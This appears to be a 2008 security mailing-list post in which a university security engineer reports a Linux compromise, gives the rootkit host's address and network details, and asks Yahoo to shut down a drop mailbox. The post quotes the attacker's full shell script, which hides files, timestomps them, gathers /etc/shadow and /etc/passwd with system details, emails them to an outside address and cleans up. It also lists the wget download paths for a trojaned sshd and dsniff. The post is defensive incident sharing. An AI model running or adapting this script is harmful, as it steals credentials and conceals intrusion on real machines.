[nsp-sec] Yahoo email address catching password files - rootkit hosted at AS 21844

Daniel Adinolfi dra1 at postoffice9.mail.cornell.edu
Fri Oct 10 14:09:25 EDT 2008


Folks,

We have a major incident here involving a number of linux hosts.  The  
script that gets run by the bad guys send the /etc/passwd and /etc/ 
shadow files (along with some other tidbits) to a particular yahoo.com  
email address.  It also installs a trojaned sshd and installs dsniff.

The email address in question is cc.cappy at yahoo.com.  Can someone at  
Yahoo please take down this address?

The root kit is available here:

webbuild.org

which is currently at 75.125.198.200.

AS      | IP               | AS Name
21844   | 75.125.198.200   | THEPLANET-AS - ThePlanet.com Internet  
Services, Inc.
PEER_AS | IP               | AS Name
2914    | 75.125.198.200   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356    | 75.125.198.200   | LEVEL3 Level 3 Communications
3561    | 75.125.198.200   | SAVVIS - Savvis
4565    | 75.125.198.200   | MEGAPATH2-US - MegaPath Networks Inc.
6461    | 75.125.198.200   | MFNX MFN - Metromedia Fiber Network
7922    | 75.125.198.200   | DNEO-OSP3 - Comcast Cable Communications,  
Inc.

The following files are downloaded after the compromise, which we  
believe is through X-Windows.

WGET /.web/ssh.tgz
WGET /.web/sniff.tgz
WGET /.web/clean

ssh.tgz is a sshd replacement.  sniff.tgz is dsniff.

This is the script that was run to send the password and system info:
________________________

dir=`pwd`
mkdir /var/spool/.mail
mv snif2/* /var/spool/.mail
touch -acmr /usr/sbin/sshd /var/spool/.mail/*
cd /var/spool/.mail
./start

cd $dir
echo "[+]Sending root information"
echo "##########hostname##########" >> mail
hostname -f >> mail
hostname -i >> mail
echo "##########shadow list##########" >> mail
cat /etc/shadow >> mail
echo "##########passwd list##########" >> mail
cat /etc/passwd >>mail
echo "##########ifconfig##########" >> mail
/sbin/ifconfig | grep inet >> mail
echo "##########kernel type##########" >> mail
uname -a >> mail
echo "Os system" >> mail
cat /etc/issue >> mail
echo "sending mail"
mail cc.cappy at yahoo.com -s "$(hostname -f)" < mail
cd ..
rm -rf sniff
rm -rf sniff.tgz

___________________________

If folks would like more info, please feel free to contact me directly.

Thanks.

-Dan


_________________
Daniel Adinolfi, CISSP
Senior Security Engineer, IT Security Office
Cornell University - Office of Information Technologies
email: dra1 at cornell.edu   phone: 607-255-7657





More information about the nsp-security mailing list